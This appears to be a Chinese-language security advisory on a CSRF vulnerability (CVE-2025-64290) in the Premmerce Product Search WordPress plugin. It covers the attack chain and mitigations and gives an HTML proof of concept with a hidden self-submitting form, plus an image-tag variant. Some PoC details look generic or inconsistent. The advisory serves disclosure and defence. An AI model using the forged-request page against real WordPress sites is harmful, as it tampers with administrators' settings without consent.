CVE-2025-64290 Premmerce Product Search for WooCommerce跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-64290

漏洞类型

CSRF（跨站请求伪造）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Premmerce Product Search for WooCommerce (premmerce-search)

漏洞概述

CVE-2025-64290是WordPress插件Premmerce Product Search for WooCommerce中的一个跨站请求伪造（CSRF）漏洞。该插件是一款用于增强WooCommerce产品搜索功能的专业WordPress插件，在WordPress生态系统中被广泛使用。漏洞存在于插件的 premmerce-search 组件中，由于缺少对关键操作的CSRF令牌验证，攻击者可以构造恶意请求诱使已登录的管理员用户在不知情的情况下执行非预期的管理操作。攻击者通常通过社会工程学手段，如诱导管理员点击恶意链接或访问包含恶意表单的网页，来触发CSRF攻击。由于WordPress管理员具有较高的权限，成功的CSRF攻击可能导致网站设置的恶意修改、插件配置的篡改，甚至可能导致进一步的持久性攻击。此漏洞的CVSS评分为4.3，属于中等严重程度，主要因为攻击复杂度较低且不需要认证，但需要用户交互才能成功实施。

技术细节

跨站请求伪造（CSRF）是一种利用用户已认证身份的攻击方式。在Premmerce Product Search for WooCommerce插件中，攻击者利用了WordPress管理员在进行插件配置时缺少适当的CSRF保护机制。攻击者可以构造一个恶意HTML页面，包含自动提交的表单，该表单模拟管理员对插件设置的操作请求。当已登录的管理员访问该恶意页面时，浏览器会自动携带其有效的认证Cookie发送请求到目标WordPress站点。由于服务器无法区分这个请求是来自合法管理员的操作还是攻击者构造的恶意请求，攻击者的请求将被执行。典型的攻击场景包括：修改插件的搜索配置参数、触发插件的数据库操作、或诱导管理员访问恶意构造的搜索功能页面。攻击者还可以结合其他漏洞（如XSS）来增强攻击效果，实现持久化控制。建议开发者使用WordPress提供的wp_nonce_field()函数为所有状态变更操作添加nonce令牌，并在服务器端使用wp_verify_nonce()进行验证。

攻击链分析

STEP 1

步骤1

攻击者侦察目标网站，确认其使用Premmerce Product Search for WooCommerce插件且版本<=2.2.4

STEP 2

步骤2

攻击者分析插件的功能端点，识别缺少CSRF保护的操作（如插件设置更新、搜索配置修改等）

STEP 3

步骤3

攻击者构造恶意HTML页面，包含自动提交的表单，该表单模拟管理员对插件的操作请求

STEP 4

步骤4

攻击者通过社会工程学手段（钓鱼邮件、恶意链接、第三方网站嵌入等）诱导已登录的管理员访问恶意页面

STEP 5

步骤5

管理员浏览器自动携带有效Cookie发送恶意请求到目标WordPress站点

STEP 6

步骤6

目标服务器无法验证请求来源的合法性，执行攻击者构造的操作，导致插件配置被篡改

STEP 7

步骤7

攻击成功，攻击者可能利用修改后的配置进一步实施持久化攻击或窃取敏感信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-64290 -->
<!-- Premmerce Product Search for WooCommerce CSRF Attack -->
<!DOCTYPE html>
<html>
<head>
    <title>CSRF PoC - Premmerce Product Search</title>
</head>
<body>
    <h1>CSRF PoC for CVE-2025-64290</h1>
    <p>This PoC demonstrates a CSRF vulnerability in Premmerce Product Search for WooCommerce plugin.</p>
    
    <!-- Auto-submit form that simulates plugin configuration change -->
    <form id="csrfForm" action="https://target-site.com/wp-admin/admin-post.php" method="POST" style="display:none;">
        <!-- WordPress general settings nonce -->
        <input type="hidden" name="action" value="update" />
        <input type="hidden" name="option_page" value="premmerce_search_options" />
        <input type="hidden" name="_wpnonce" value="" />
        
        <!-- Malicious plugin configuration -->
        <input type="hidden" name="premmerce_search_settings[search_placeholder]" value="Malicious Search Placeholder" />
        <input type="hidden" name="premmerce_search_settings[enable_ajax]" value="1" />
        <input type="hidden" name="premmerce_search_settings[search_results_page]" value="malicious_page" />
    </form>
    
    <script>
        // Auto-submit the form when page loads
        document.getElementById('csrfForm').submit();
    </script>
    
    <p>If you see this message, the form has been submitted.</p>
    <p>Target: Premmerce Product Search for WooCommerce <= 2.2.4</p>
</body>
</html>

<!-- Alternative: Image-based CSRF (no user interaction) -->
<!-- <img src="https://target-site.com/wp-admin/admin-post.php?action=update&option_page=premmerce_search_options&premmerce_search_settings[search_placeholder]=HACKED" style="display:none;" /> -->

影响范围

Premmerce Product Search for WooCommerce <= 2.2.4

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1）暂时禁用或删除Premmerce Product Search for WooCommerce插件；2）限制管理员账户的使用，避免从不可信的网络访问后台；3）使用浏览器安全插件防止自动提交表单；4）在Web应用防火墙（WAF）中添加针对CSRF攻击的规则，拦截异常的admin-post.php请求；5）监控管理员操作日志，及时发现异常配置变更。建议管理员保持警惕，不要点击来自不可信来源的链接，定期检查插件配置是否被篡改。